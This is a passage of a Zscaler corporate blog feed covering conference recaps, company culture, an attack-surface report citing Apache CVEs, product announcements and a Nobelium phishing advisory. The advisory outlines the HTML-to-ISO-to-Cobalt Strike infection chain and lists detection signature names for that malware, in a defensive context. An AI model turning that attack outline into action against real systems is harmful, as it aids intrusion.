Zscaler's Nathan Howe, Mondi Group's Thomas Vavra, and Richemont International's Eduardo Grilo, the CTO's job is to create a fast, secure user experience for employees both returning to the office and working remotely. Our customer keynotes included four leaders whose companies have built resilience and agility within their businesses despite COVID-19 setbacks. Claude Pierre of Engie, Alain Delava, also of Engie, Sebastian Kemi of Sandvik, and Andrew Baker of Absa Group shared differing stories but their insights were similar, particularly when it came to the use of zero trust to successfully modernize their companies to enable modern workforce with a great user experience and enhanced security. We are grateful to all the customers who joined us and spoke at Zenith Live in keynote sessions, in panels, and in our technical breakout sessions. Thank you! Dear partners, Zenith Live wouldn’t be Zenith Live without you By joining with technology leaders whose services are complementary to the Zscaler Zero Trust Exchange, we can provide customers with integrated solutions that enable them to become more secure, resilient, and agile. With our partners, we have formed a strong ecosystem of future-forward thought leadership, strategy, and technology. Today’s partner summit celebrated exactly that—a group of technology evangelists and leaders joining forces to continue the digital transformation momentum over the next year and beyond. That’s all folks, see you at Zenith Live 2022! This concludes Zenith Live EMEA 2021, and what an event it was. Zscaler thanks you for making this our best Zenith Live yet! We hope you found our speaker sessions, training, panels, and workshops informative and relevant as you move full cloud ahead. If you missed Zenith Live, be sure to view its illuminating sessions on demand. We hope to see you next year! Thu, 17 Jun 2021 12:43:27 -0700 Ismail Elmas What our Latest Glassdoor Award Means to Zscaler I just learned that Zscaler’s CEO, Jay Chaudhry, has been named one of the Top 100 CEOs by Glassdoor. The award is based on a rating system submitted by employees and, for that reason, above all, I am thrilled for Jay. But I’m not all that surprised. This company has grown a lot, especially in the last year, but the company’s culture and its values that were defined by Jay more than a dozen years ago continue to inform our practices every day. What I’ve found inspiring about these values is that they are dynamic, helping us grow during changing times while staying true to our corporate ethos. As it can be said for most companies, these past 15 months have provided a case study in change. There was the rapid switch to remote work, of course, but between March 2020 and now, we also doubled our staff size, welcoming more than 1,500 new employees to the company. And while things were moving fast on multiple levels—especially supporting our customers as they transitioned their employees to remote work—Zscaler leaders paid close attention to our employees—connecting, listening, and learning about how they were feeling. We developed a range of programs to support them, help them engage with others through resource groups, and take breaks for exercise, games, or meditation. And we instituted occasional company-wide days off. We have also developed a self-service management microsite with training and skills development in partnership with Coursera and other platforms. This program, Leading at Z, is well underway, helping managers at any stage of their careers enhance their skills and develop new ones. Another program is under development for all Zscaler employees, called Succeeding at Z, to support everyone in their professional growth, so they can achieve their own definition of success. We’ve learned a lot from employees and we’ve tried to introduce programs and practices that address their concerns about work-life balance, mental and physical health, and the importance of family time and time off, and the benefit of upward mobility. It’s gratifying to see the company’s efforts reflected in employees’ reviews of Jay as the company’s leader. I’m coming up on my first-year anniversary at Zscaler and, even in this timeframe, I can see a more mature company emerging. It has a lot to do with growth, but I believe it has even more to do with the leadership team, which has always been closely aligned on the vision of building a great and lasting company. Realizing this vision requires the hiring and retention of exceptional people across the company who are excited to be here and are passionate about what we are all trying to achieve on behalf of our customers. Though the company is changing, its founding values have never changed. I believe that is why Jay is being recognized now as a top CEO, and why Zscaler will, indeed, become a great and lasting company. Here are those values: Teamwork: We celebrate together. We openly share information. We move as one. We value serving others over personal prestige. We value humility over ego by showing respect and recognizing the truth in all situations. Humble leadership empowers our employees to speak their mind and innovate. Open communication (candor over politics): We have open discussions about what’s right and what’s wrong. Put another way, we don’t enable politics. We value real feedback and relationships built upon honesty and trust. Passion (over self-interest): We are fiercely passionate about our work, our company, our colleagues, our customers, and our partners. We put grit over image, that unique combination of passion, courage, and long-term perseverance over innate talent and intelligence. Innovation: We are driven to not only innovate cloud transformation through our products but to also innovate in our jobs, whether an engineer, marketer, salesperson, or lawyer. Customer obsession: We are, above all else, obsessed about our customers’ success. Everything we do is about helping our customers succeed in their business transformation to the cloud. Part of this, too, is valuing results over activity. Join us! Zscaler continues to seek people who share these values. Please visit our careers page to learn more. Thu, 17 Jun 2021 08:01:08 -0700 Sandi Lurie Celebrating Juneteenth — Listen, Learn, and Reflect on African American History Most people are familiar with the celebration and history behind Independence Day. While the United States became free with the signing of the Declaration of Independence in 1776, Black people had not been freed from slavery at that time. As a result, many in the Black community feel somewhat disconnected from the Fourth of July holiday—a great day for America, but not for Black Americans. In fact, Black people were not declared free for another 87 years. And even still, it took an additional two years beyond Abraham Lincoln’s signing of the Emancipation Proclamation for the last enslaved people to be freed in Galveston, Texas, on June 19, 1865. Juneteenth provides a day of remembrance and reflection for all Americans, and it’s extremely gratifying to see that Juneteenth is gaining the attention it deserves as a landmark day in American history—just this week, Juneteenth was established as a federal holiday with unanimous approval by the U.S. Senate. Let’s take a closer look at the day’s origins and how the Zscaler community can contribute positively to the conversation surrounding this annual day of recognition. The first Juneteenth: a brief history For those unfamiliar with Juneteenth, we would like to share a bit of history, beginning with the General Order that was issued on June 19. It isn't talked about nearly enough, but it is the reason behind today's reflections: “The people of Texas are informed that, in accordance with a proclamation from the Executive of the United States, all slaves are free. This involves an absolute equality of personal rights and rights of property between former masters and slaves, and the connection heretofore existing between them becomes that between employer and hired labor. The freedmen are advised to remain quietly at their present homes and work for wages. They are informed that they will not be allowed to collect at military posts and that they will not be supported in idleness either there or elsewhere.” —General Orders, Number 3; Headquarters District of Texas, Galveston, June 19, 1865. What does this all mean today? June 19, 1865, also known as Juneteenth, is the oldest nationally celebrated commemoration of the ending of slavery in the United States. Juneteenth is a celebration of the journey and freedom of Black people in this country. We embrace this moment to acknowledge the many contributions that Black people have made to American culture and honor those who died for our freedom. Juneteenth is the real "Freedom Day" for African Americans. But to have true freedom, we must continue to break through the systemic barriers that have plagued African American communities for centuries around the world. To me, Juneteenth is a day of empowerment. As the company-wide programming and committee chair of B@Z—Zscaler’s internal network of African American employees and allies—I believe that empowerment is about leveraging our platforms, exercising our voices in everyday moments, and being intentional about our actions for change. Zscaler’s Juneteenth Town Hall Celebration Zscaler is honoring Juneteenth by hosting a company-wide Town Hall celebration to educate, empower, and uplift employees. Our Diversity, Equity, and Inclusion resource group, B@Z, has curated a cultural visual experience along with an intimate conversation with Marvin Whitaker and Michelle Smith on the importance of Juneteenth and the impact systemic racism has had on the Black community. We also wanted to share some resources that we are excited about. These organizations not only support Black businesses, but also leverage technology to build momentum behind these initiatives: MyBlackReceipt, launched June 19, 2020, is the first “Buy Black” movement that quantifies collective purchases from Black-owned businesses. This movement encourages consumers to support Black-owned businesses and show their support by uploading receipts—starting Juneteenth, sales totals will be shown on a live counter. When you support a Black business owner, you support Black jobs, Black causes, and Black wealth building. So, find Black businesses and upload your receipts! WeBuyBlack is an online marketplace where customers may purchase everything they need from Black-owned businesses, helping to build social and economic justice globally. Sellers may register to sell their products to a diverse, open, and international market. The site was launched for public purchases on June 19, 2015, which marked the 150th anniversary of Juneteenth. I’m proud to be a part of B@Z and the Zscaler community as a whole. The services that Zscaler delivers are consequential, and it’s exciting to work alongside people who are empowered to do their best work and are passionate about bringing positive change to enterprise customers. As we all reflect on Juneteenth, let’s celebrate empowerment in all its forms—in our professional lives, in our personal quests, and in the memories and the progress the day represents. And let’s all commit to paying it forward, as there is still much work to be done. Additional resources about Juneteenth The Root: PBS: Wed, 16 Jun 2021 17:56:28 -0700 Tyrin Ford Zscaler Customers Are Moving Full Cloud Ahead What an incredible conclusion to day one of our fourth annual Zenith Live virtual conference! It was an honor to share the stage with my colleagues, guest luminaries, and our marquee multinational customers, BP and DHL. We reached a new record with more than 15,000 registrants committing two days to learn how organizations globally are adopting zero trust to rapidly secure work-from-anywhere, prevent cyberthreats and data loss, and improve the digital experience for users everywhere. Zero trust is accelerating transformation The cloud and mobility have been agents of change, empowering organizations to harness the speed and agility they need to remain competitive. The pandemic didn’t change this trajectory, but it did accelerate it. As organizations scaled remote access for most of their employees, those that had the greatest success had already begun their zero trust journeys. It was inspiring to hear customers describe how zero trust helped them through the crisis, and is now empowering their businesses to speed the development of new products and services, become more productive and collaborative, and protect their data, all in a way that simplifies IT. That, to me, is the definition of a modern organization. In my keynote, I described how the Zscaler Zero Trust Exchange, our cloud-native platform that powers all Zscaler services, is helping customers accelerate transformation in three critical ways. The first is by enabling workplace modernization, which means that employees can work from anywhere, securely, with a fast, streamlined user experience. The Zero Trust Exchange also enables network transformation with fast, secure, direct-to-cloud connections that simplify branch connectivity and eliminate costly wide area networks. And it powers security transformation to prevent cyberthreats, prevent data loss, and eliminate the risk of lateral threat movement. Customers provided the most inspiring moments at Zenith Live When customers get up and talk about their experiences, we know that’s when audience members pay especially close attention. Our customers can speak to the types of challenges each attendee is likely to face at one point or another. I am so grateful for all the customers who are participating this year in Zenith Live keynotes, CXO panels, our Women in IT exchange, and the many who joined in our technical breakouts to discuss their Zscaler implementations and experiences with our services. For BP, IT is building a more agile company This morning I spoke with Rasik Vekaria of BP, a company with 70,000 employees and operations in 120 countries. He described BP’s journey to zero trust. “For me, a zero trust architecture was critical to what we do from a security standpoint. This means, I don't care if you're on the network, in the network, around the network, over the network—we treat everything as if it’s compromised.” That approach, that mindset, is the crux of zero trust. If you assume that everything is compromised, you won’t let anything on your network. You inspect all traffic, coming and going, even if it’s encrypted, to prevent attacks and data loss. And you make your applications invisible to the internet to eliminate the attack surface. DHL is making every connection fast, simple, and secure Later in the morning, Zscaler’s VP of Emerging Technology, Nathan Howe, spoke with DHL’s VP and Head of Telecoms, David Branik. DHL has operations in almost every country, with third-party partners around the world, remote employees using a range of devices, customers accessing their data in real time, creating an incredibly complex task for the IT team. David spoke of the need to make access fast and simple for every type of user: “It's almost like...when you go and plug in something into the wall circuit, you expect that the electricity is there. You don't want to think about what's behind it. And I think, from a network perspective, it's virtually the same thing.” At Zscaler, we agree that the experience for any type of user should be frictionless, and it should be the same no matter where the user is connecting. User experience must be a business imperative. See you tomorrow for more announcements, demos, and customer stories Tomorrow, I look forward to hearing from Bruce Lee of Centene, a company that has grown tenfold—from 8,000 employees to 80,000—in ten years. With much of that growth through mergers and acquisitions, I know that Bruce will touch on the complexity the company faced, and how zero trust is enabling them to accelerate M&As from years to months to weeks. In case you missed any of today’s sessions, we will make recordings available soon. And Zenith Live 2021 (Americas) continues tomorrow at 8:30 AM PDT, while day one of Zenith Live in the European (EMEA) region kicks off at 8:30 BST. There is much more in store for Zenith Live day two. In addition to Wednesday’s keynotes, customer panels, executive panels, and guest speakers, the virtual conference continues with architecture workshops, technical deep dives, and countless other opportunities to roll up your sleeves and go full cloud ahead. I hope to see you there. Tue, 15 Jun 2021 20:13:46 -0700 Jay Chaudhry 2021 “Exposed” Report – An Exposé on the True Corporate Network Attack Surface Exposure noun ex·​po·​sure | \ ik-ˈspō-zhər a: the condition of being made known b: the condition of being unprotected c: the condition of being subject to some effect d: the condition of being at risk of financial loss e: all of the above The word “exposure” has come up a lot over the last year, especially with regard to our physical health, but also the health of our corporate networks. In fact, these two realms of exposure are more closely related than we may have previously thought. As COVID-19 has forced many organizations to declare WFH orders to limit exposure to employees, remote work has increased the exposure to corporate networks due to the heavy reliance on the internet as the connective means for the business. Cybercriminals have been quick to take advantage of this exposure and are exploiting the fact that remote access has created opportunities to target remote workers, their devices, and the tools they use to access the internet, applications, and critical business systems while away from the office. This increase in VPN, RDP, and network-focused attacks puts businesses at risk, as direct access to the corporate network enables cybercriminals to move laterally throughout an organization’s infrastructure. The conversation of exposure and attack surface is one that IT and security teams must face head-on to address the expanding attack surface and seek to minimize exposure. But how exposed are corporate networks? The 2021 “Exposed” report answers this question for the first time as it analyzes the visible attack surface of more than 1,500 organizations over the last year, uncovering attack surface trends affecting businesses of all sizes across all geographies and industries. While you can access the full report here, we wanted to highlight three interesting discoveries we found: 1. Most attack surface is the result of server and port exposure The highest level of exposure we found came from servers, with 392,298 servers that were discoverable on the internet and possibly vulnerable. Our findings indicate that a total of 68 unique ports were discoverable and were exposed 214,230 times across all exposed servers. The most exposed ports were: 2. CVE vulnerabilities present huge potential risk We uncovered 202,316 potential CVE vulnerabilities and identified 750 unique exploits across the attack surfaces of these 1,500+ businesses. These numbers result in an average of 135 potential CVE vulnerabilities per company, with 49 percent of them considered “Critical” or “High” in severity. The three most common CVE vulnerabilities are: CVE-2018-1312 – CRITICAL – 6.8 CVSS Score In Apache httpd 2.2.0 to 2.4.29, when generating an HTTP Digest authentication challenge, the nonce sent to prevent reply-attacks was not correctly generated using a pseudo-random seed. In a cluster of servers using a common digest authentication configuration, HTTP requests could be replayed across servers by an attacker without detection. CVE-2017-7679 – CRITICAL – 7.5 CVSS Score In Apache httpd 2.2.x before 2.2.33 and 2.4.x before 2.4.26, mod_mime can read one byte past the end of a buffer when sending a malicious content-type response header. CVE-2019-0220 – MEDIUM – 5.0 CVSS Score A vulnerability was found in the Apache HTTP Server 2.4.0 to 2.4.38. When the path component of a request URL contains multiple consecutive slashes ('/'), directives such as LocationMatch and RewriteRule must account for duplicates in regular expressions, while other aspects of the server’s processing will implicitly collapse them. Are you exposed? > Find out now with our free attack surface analysis. 3. Public cloud contributes to exposure, too The massive shift to work from home has led to a lot of companies relying on cloud services and platforms in order to quickly scale with minimal downtime. Based on our analysis, we discovered 60,572 exposed instances, which averages out to about forty exposure per company monitored. Here’s the breakdown of exposure across some of the top cloud platforms: Minimizing your attack surface is an imperative While the “Exposed” report provides the world’s first view on how exposed corporate networks really are, it’s up to IT and security teams to take steps towards minimizing attack surface. This is just a small glimpse into our findings. See how your company’s attack surface compares to industry peers and get the full report here: > Download report > Measure your attack surface Tue, 15 Jun 2021 08:00:01 -0700 Camilla Ahlquist Introducing Zscaler and ServiceNow: Protect More, Work Smarter As a cloud platform, ServiceNow delivers digital workflows that create great experiences and unlock productivity.. But it also consumes and distributes massive amounts of sensitive data, which in today’s world is typically accessed by users working from outside the corporate network and away from traditional security controls stuck in the data center. By extending a zero trust approach to cloud applications, such as those delivered on the Now Platform®, organizations can ensure that they remain secure from data loss and compliance violations while enabling faster responses to emerging security incidents. In light of this, we’re excited to announce our new ServiceNow integrations which not only improve the platform's security posture against data loss and emerging threats, but also improves data visibility, data control, and security operations workflows within all areas of the Now Platform. With Zscaler Data Protection integrations, ServiceNow customers can rest assured their most sensitive data remains secure from data exfiltration and compliance violations. Let’s take a closer look at these integrations and some of the challenges they help ServiceNow customers solve. Solving data threat challenges within the Now Platform: Visibility into sensitive data and restoring compliance Like any cloud application, visibility into sensitive data is a must when forming a comprehensive data protection strategy—especially when considering the need to uncover, remediate, and ultimately avoid compliance violations. By leveraging Zscaler CASB and DLP, ServiceNow customers can improve data protection across their ServiceNow instances. Zscaler scans the entire NOW customer deployment instance for sensitive data to identify risky exposure and compliance issues. In doing this, security teams can quickly understand where sensitive data lives, how it’s being used, and who is accessing it. Figure 1: Restore data protection and compliance Enabling work-from-anywhere and controlling unmanaged devices With so many unmanaged and BYOD devices accessing the Now Platform, today’s businesses need more control on how this data is being accessed. Through the Zscaler Zero Trust Exchange, organizations can remove the risks associated with BYOD and unmanaged devices accessing ServiceNow data. Zscaler Identity Proxy makes it easy for ServiceNow customers to authenticate unmanaged devices residing outside the corporate network by automatically restricting access from devices deemed too risky to access the platform. By redirecting to Zscaler, risky BYOD and unmanaged devices are prevented from accessing ServiceNow directly. Devices can only connect to ServiceNow through Zscaler to enforce security policies and access controls. Figure 2: Securely enable work-from-anywhere By preventing risky unmanaged and BYOD devices from accessing ServiceNow instances and sensitive data, ServiceNow customers can enable a more secure work-from-anywhere experience across secure managed devices only. Pair this with Zscaler Cloud Browser Isolation, which streams data to unmanaged devices via screen pixels, data can be accessed while preventing the downloading, copying/pasting, and printing of it. Responding to data threats with closed-loop workflows When security incidents that are logged lack context, it is extremely difficult to quickly triage and remediate threats in real-time. Together, ServiceNow Security Incident Response and Zscaler Threat Intelligence can automatically orchestrate response actions. By leveraging Zscaler threat intelligence and Cloud Sandbox, ServiceNow Security Operations (SecOps), you can accelerate security incident workflows. Risky IP domains and URLs can be blocked without manual intervention, while cloud misconfigurations can be corrected to help reduce the risk of a breach. Response time is reduced, and IT teams increase productivity. In addition, cloud misconfiguration can be logged in ServiceNow IT Service Management (ITSM) for further investigation and remediation. Figure 3: Improve security workflows Figure 4: Quickly remediate cloud misconfigurations Explore more Learn more about Zscaler’s latest ServiceNow integrations with the resources below: Zscaler and ServiceNow Solution Brief Deployment Guide About Zscaler Data Protection Zscaler Data Protection follows your users and the applications they are accessing, always protecting you against data loss. Zscaler inspects your traffic inline, encrypted or not, and ensures your SaaS and public cloud applications are secure, giving you the protection and visibility you need. The Zscaler Cloud Security Platform was built with compliance in mind, offering you an essential tool for complying with all major regulations and making data protection painless. Thu, 10 Jun 2021 05:00:01 -0700 Steve Grossenbacher A Powerful Combination: Active Defense, the Bridge to Zero Trust The end of May marked a monumental juncture for Zscaler as we continued to extend the company’s cybersecurity reach with our intent to acquire Smokescreen Technologies, a leader in active defense technology. This week, I am excited to report that the Smokescreen deal has closed, and we are proceeding to integrate its leading-edge active defense capabilities into the Zscaler Zero Trust Exchange. In contrast to traditional network traffic analysis tools, which are noisy and prone to false positives, active defense uses elaborate decoys and honeytraps to block the most sophisticated threats with high accuracy as attackers attempt to traverse corporate networks. The appeal of active defense is how it turns the tables on would-be attackers. Security teams don’t have to hunt for network threats, rather the bad actors are lured to honeytraps, dramatically slowing their progression in order for security teams to quarantine the threats. While the ultimate answer is to migrate to a zero trust architecture, thus eliminating the risk of network access, active defense is founded on the similar concept of trusting nothing and assumes that the network is already breached. This offers organizations a pragmatic path to zero trust and provides a simple yet effective way for them to identify and remove attackers who may already be expanding laterally and compromising resources on the corporate network. I invite you to learn more about Smokescreen’s active defense technology at Zenith Live 2021. The Zscaler ThreatLabZ experts will also share in-depth research into emerging attacks, dissect recent attack chains, and provide clear guidance on how to better secure your enterprise from sophisticated threats targeting your software supply chain. You’ll also get an exclusive preview into Zscaler’s protection suite, which unifies our threat intelligence, cybersecurity experts, and innovative technology to help defend your organization against the most advanced attackers. Forward-Looking Statements Blog posts on this site may contain forward-looking statements that are based on beliefs, assumptions and on information currently available to our management. These statements, including but not limited to statements relating to our products, customers, business development activities and business results, are subject to the safe harbor provisions created by the Private Securities Litigation Reform Act of 1995. You can identify these forward-looking statements by terminology such as “will,” “expects,” “believes,” “anticipates,” “intends,” “estimates” and similar statements. A significant number of factors could cause actual results to differ materially from statements made in blog posts on this site. Additional risks and uncertainties are set forth in our filings made with the Securities and Exchange Commission (“SEC”), which are available on our website at and on the SEC's website at Any forward-looking statements in these blogs are based on the limited information currently available to Zscaler as of the date thereof, which is subject to change, and Zscaler will not necessarily update the information, even if new information becomes available in the future. Mon, 07 Jun 2021 12:44:09 -0700 Jay Chaudhry 5G and the Power of the Edge The buzzwords of 5G and edge computing have forced their way into the spotlight of digital transformation, bringing with them huge potential to spark the next major wave of change. While 5G has the power to boost connectivity speeds – transmitting data 10 times faster than conventional connections – edge computing strives to get closer to the end user or end device to reduce latency, forming a powerhouse pairing that could ultimately replace traditional network structures completely. This shift paves the way for a revolution in production processes – a revolution that received extra push during the pandemic. Constrained by social distancing rules, production companies began to look for automation and remote-control solutions to keep lines flowing. Operational technologies (OTs) also benefit from these trends, which enable employees to monitor and control their machines remotely. However, OTs are still weighed down by their reputation for being slow and unwieldy in the face of change. In the manufacturing industry, fundamental transformation is usually planned well in advance, because security plays a business-critical role in the safe and uninterrupted operation of the machinery fleet. But the technology for change is already in the starting blocks, and it can be ready to go as soon as 5G masts are rolled out and widespread coverage is available. How does 5G work with (mobile) edge computing? The cornerstones of modern connectivity are speed, real-time data transmission, and mobile network density. The 5G data transmission standard will not only significantly speed up our cellular networks, it will also allow us to transmit data at a much faster rate. In ideal conditions, 5G will be capable of transmitting data 20 times faster than standard connections – delivering the speeds that are so essential to augmented reality and virtual reality applications, to name just a few examples. In these applications, the response time between the device and image processing should be no more than 12 to 15 milliseconds; slower processing could cause the user to experience VR motion sickness. 5G technology is not just about speed, either. Availability and reliability are also critical components of the Industry 4.0 applications of the future. Looking to the present day, ultra-reliable low-latency communication (URLLC) and edge clouds are already essential to real-time applications and seamless communication with machines beyond traditional networks. Aside from the many other factors that come into play in 5G network design, physical proximity to the device is critical to achieving low latency. This means that the core network infrastructure, security infrastructure, and application server need to be relocated from centralised data centres to the edge of the network and closer to the user. Computing on the edge is now a key prerequisite for many applications. Another major difference between 5G and 4G is the density of user transactions. While today’s 4G technology allows 4,000 users within a one-kilometre radius to be simultaneously connected, 5G can handle up to a million simultaneous connections. It is precisely this transaction density that opens the door to a whole new way of thinking – turning the traditional network infrastructure on its head in ways that would never previously have been possible. 5G provides connectivity infrastructure for all devices without a network connection. By extension, this also means that security can no longer be delivered via the network infrastructure. Security at the edge comes from the cloud The Zscaler security cloud is already equipped with the functions required to keep up with the pace of change. Zscaler’s Zero Trust Exchange provides security at the edge and filters all user and machine traffic in the cloud. It does so using a cloud-native infrastructure – which also enables it to be deployed in a range of different locations, as close as possible to the end user or the machine. However, cloud technology has already reached a point at which far-reaching expansion to the edge is required. And this is precisely where 5G technology comes into play; it will enable companies to harness the full power of edge computing. The crux of this power lies in mobile edge computing (MEC). At the ultimate edge, data traffic generated when browsing a website, for example, is no longer routed via the telecommunications network to the internet and then back again, but directly via the cellular antennae in the immediate vicinity of the mobile device. This facet – the exact location of data processing in mobile edge computing – is not yet a widely recognised advantage of 5G. However, at some point or another, things are bound to start moving in this direction. When 5G and MEC eventually render traditional networks obsolete, cloud-based security will become an enabler of security for Industry 4.0 and end customers alike. To learn more about Zscaler emerging technologies, register for Zenith Live today! Mon, 07 Jun 2021 08:00:01 -0700 Nathan Howe Never Waste a Good (InfoSec) Crisis This post originally appeared on LinkedIn. While the best-managed crises are undoubtedly the avoided ones, there are some that plunge businesses and countries into turmoil en masse. The current global pandemic reminds me of the expression that you should “never waste a good crisis.” Indeed, the current crisis is driving change. Early in the pandemic, Fortune surveyed Fortune 500 CEOs, and three-quarters said COVID-19 would be accelerating their company’s technological transformation. If such dramatic enterprise transformation is to happen, it will be Chief Information Security Officers (CISOs) who lead it. This crisis represents an opportunity CISOs to build on transformation momentum—but only if they leave behind old-world thinking. CISOs and their security teams must stop trying to mold legacy networks and security models to fit an evolving business world, and instead recognize security as an engine to drive strategy. Before the crisis As infrastructure and applications have “decentralized” to the cloud, progressive IT organizations have begun retiring outdated, vulnerable, perimeter-based legacy “castle-and-moat” security architectures that aimed to protect on-premises data from outside threats. At the same time, they are sunsetting similarly archaic “hub-and-spoke” network models that backhaul corporate traffic through the data center. The vision: A cloud-based services model, with direct connectivity to applications and internal resources. The current crisis has become a litmus test of cloud-migration commitment: Enterprises well on their way to embracing network and security transformation fared better than ones that had put off major network and infrastructure overhauls. Crisis is a disruptor The etymology of the word “crisis” includes the notions of “judgment” (perception of risk, its imminence, and related impact) and “decision” (reactions to and strategies for embracing change). Judge what risks are faced, then decide what actions to take. Crisis “pain” stems from an inability to take the actions needed based on those judgements and decisions. Crisis management is an essential component of business strategy. Over the last decade, with the overwhelming shift of business to online models, the focus of crisis management has been around IT security rather than physical implications. The unprecedented COVID-19 health crisis happened as many companies were on their way to enacting new security and network architectures. How much pain the crisis caused each business often depended on the maturity of their transformation process. Currently, many workforces can’t get back into the office. These same workforces need to perform vital company functions—wherever they sit. How do you securely connect remote workforces to cloud-based and on-premises resources? In the legacy, secure-the-perimeter world, VPNs would be the only option. But VPNs can’t easily (or affordably) scale to accommodate dramatic traffic volume growth. Worse, VPNs also pose higher security risks: How do you secure the perimeter of a corporate network that now encompasses the entire internet? Connecting users to the corporate network from unmanaged endpoints exposes network access paths, allows unmanaged east/west traffic communication across the network, requires complex policy definition, limits comprehensive monitoring, provides bad user experiences, and creates architecture headaches. In the modern world, where data does not always (or even often) reside in the data center, backhauling internet traffic through the corporate network then back out to the cloud no longer makes sense. It’s inefficient and expensive. Traffic should take the path of least resistance, go direct-to-cloud, and provide a fast and seamless experience. As such, the pandemic caused more “crisis pain” for companies clinging to legacy security and network architectures than it did for companies that were well down the path of their digital transformation journey. Using our crisis etymology, digitally transformed companies could make judgments about crises' business ramifications and then agilely decide on responses. They could enable work-from-anywhere experiences with little to no impact to work efficiency. Other, less-mature companies struggled. To enable remote access, they were forced to improvise, then pivot to (what were for them) new network and security architectures—changes that came with high costs and impacts to productivity. Don’t get disrupted by crisis Cloud services have become so integral to business strategy, operations, and productivity that their effective enterprise use influences business performance and earning power. The pandemic has shown that companies must react quickly to dramatic change. And companies that leverage the cloud are more agile than organizations that don’t. We can’t easily predict the future. Is company-wide telecommuting here to stay? Are brick-and-mortar offices on the way out? Maybe, maybe not. But the future will look different: telecommuting (in whatever form) isn’t going away, and CISOs must prepare for “work from anywhere” in future business strategies. Should CISOs seek to make incremental improvements to legacy systems so that they continue to limp along? Or should they embrace new business models that enable network transformation? (Hint: It’s the latter.) Change can be hard. But now is the right time to rethink network infrastructure. For some, “digital transformation” may have just been a buzz phrase before the pandemic. But now it’s a mission, and a path forward to enterprise agility. Network and security architectures must have the flexibility to address company-wide change—and address it quickly—for enterprises to remain functional. And that means decentralization of network resources, and migration to the cloud. Secure Access Service Edge (SASE) and Zero-Trust Network Access (ZTNA) represent the future of enterprise architectural agility and resilience. I work for a company that helps companies use the new cloud-driven model as it was intended: as a decentralized infrastructure that engenders growth and productivity. The pandemic has challenged everyone, but we cannot “let it go to waste.” In response to the current crisis, today’s CISOs must learn from it and pivot to transformation. Otherwise, they will fall further behind, and be even less prepared the next time a difficult situation arises. Will your enterprise disrupt or be disrupted by the next crisis? Fri, 04 Jun 2021 10:18:36 -0700 Nicolas Casimir Coverage Advisory For Email Based Attack From Nobelium Background: On 27th May Microsoft released a blog on a very sophisticated attack conducted by the threat actor, named Nobelium. While it is believed that threat actor kept changing the initial attack vector multiple times in past few months, the latest technique of abusing mass email service to send spear phishing emails targeted approximately 3000 email accounts in approximately 150 organizations including government, non-government, military, IT services, think tanks, health services and research and telecommunication. The same threat actor, Nobelium, is also believed to be behind the massive supply chain attack against SolarWinds in Dec 2020. What is the issue The threat actor, Nobelium, is using a unique infrastructure for each target which makes this attack more sophisticated. The attack starts with a malicious email campaign asking the victim to download and execute an HTML file. This HTML file after successful execution, writes an ISO file on the disk and mounts as a drive. The lnk file in the ISO is executed first and it runs the cobalt strike beacon into the system. After the execution, the threat actor achieves persistence on the system and performs post exploitation activities such as, lateral propagation, data exfiltration etc. Microsoft has provided technical analysis of the attack here. Best practices/guidelines to follow: Route all server traffic through Zscaler Internet Access, which will provide the right visibility to identify and stop malicious activity from compromised systems/servers. Restrict traffic from critical infrastructure to an allow list of known-good destinations Ensure you are inspecting all SSL traffic. Turn on Advanced Threat Protection to block all known command-and-control domains. Extend command-and-control protection to all ports and protocols with the Advanced Cloud Firewall (Cloud IPS module), including emerging C2 destinations. Use Advanced Cloud Sandbox to prevent unknown malware delivered as part of a second stage payload. Limit the impact from a potential compromise by restricting lateral movement with identity-based micro-segmentation (Zscaler Workload Segmentation) and a Zero Trust architecture. Safeguard crown jewel applications by limiting lateral movement using Zscaler Private Access. Zscaler coverage: Zscaler leveraged the details on the countermeasures published by Microsoft to ensure coverage. Enhanced protection has been added wherever necessary across multiple layers of the Zscaler security platform. Below are the threat names of the existing detections: Advanced Threat protection Win32.Backdoor.Cobaltstrike.LZ Win32.Trojan.Nobelium.LZ Malware protection: Win32.Trojan.NOBELIUM Win64.Backdoor.CobaltStrike HTML.Dropper.EnvyScout LNK.Downloader.CobaltStrike PDF.Trojan.NOBELIUM Details related to these threat signatures can be found in the Zscaler Threat Library. Advanced Cloud Sandbox We have ensured that Zscaler Cloud Sandbox flags these Indicators Of Compromise (IOCs) and also protects against the unknown indicators. As always, Cloud Sandbox plays a critical role in blocking any custom variants that may be developed from these stolen tools. Zscaler ThreatLabZ team is also actively monitoring this campaign and any activity around Nobelium and the impact to ensure coverage for newer IOCs as they are discovered. Wed, 02 Jun 2021 00:36:33 -0700 Amit Banker Responsible Organizations Must Take Decisive Actions After a Ransomware Attack This post also appeared on LinkedIn. The recent spate of ransomware attacks and the release of the new cybersecurity Executive Order foreshadow increased scrutiny for companies managing critical infrastructure and personal data. Ransomware attacks are happening more frequently: besides the Colonial Pipeline attack, last week saw Ireland’s health systems shut down, and attackers compromise AXA Partners after it announced its insurance policies would no longer cover ransomware demands. Attacks like the Colonial Pipeline bring profound real-world implications: millions of people without services, millions lost in revenue, reputations tarnished, general societal chaos and dysfunction, and attackers paid and free to hit other targets. Ransomware attacks have been the norm for more than seven years now. Many organizations, private and public, small and large, have been a victim of such attacks. And yet, companies continue to underestimate the risk of cyberattacks, especially ransomware. So why isn’t ransomware a top priority for everyone? A previous audit of Colonial Pipeline showed severe security posture flaws, and one researcher said, “an eighth-grader could have hacked into that system.” The recent Executive Order on Improving the Nation’s Cybersecurity and more stringent privacy laws such as GDPR and CPRA are going to make the ramifications of data theft interesting. Norsk Hydro’s response to a ransomware attack in 2019 was a model of change that showed a deep desire to learn, improve, and (most importantly) protect the data that the company had in its trust. They used their attack to rebuild their network security from the ground up using zero trust architectures that connect users to applications directly and limit lateral movement across systems by monitoring workflows across different cloud deployments. Will Colonial Pipeline follow suit? What have we learned from the Colonial Attack? It wasn’t a targeted attack on the Industrial Control Systems (ICS) or Operational Technology (OT). Unlike the Saudi Aramco attack of 2017, this attack has no indications that it caused physical damage to the pipelines or injured plant operations personnel. This is most likely an attack that locked up the IT systems that managed operational inventory and logistics. Paying the ransom is not going to restore your operations in time. A well-planned and tested backup and restore strategy can save the day. Paying the ransom only encourages more attacks. An 81-page urgent action plan delivered to the White House April 2021 by a public-private task force noted that enriching ransomware criminals only fuels more global crime, including terrorism. Insurance companies are starting to exclude ransom payments. In an apparent industry-first, the global insurance company AXA said Thursday it would stop writing cyber-insurance policies in France that reimburse customers for extortion payments made to ransomware criminals (and then promptly got hit with a ransomware attack). The US government is finally taking notice. The new Biden Administration executive order requires organizations to go beyond the compliance-based approach. “Within 60 days of the date of this order, the head of each Federal agency shall …develop a 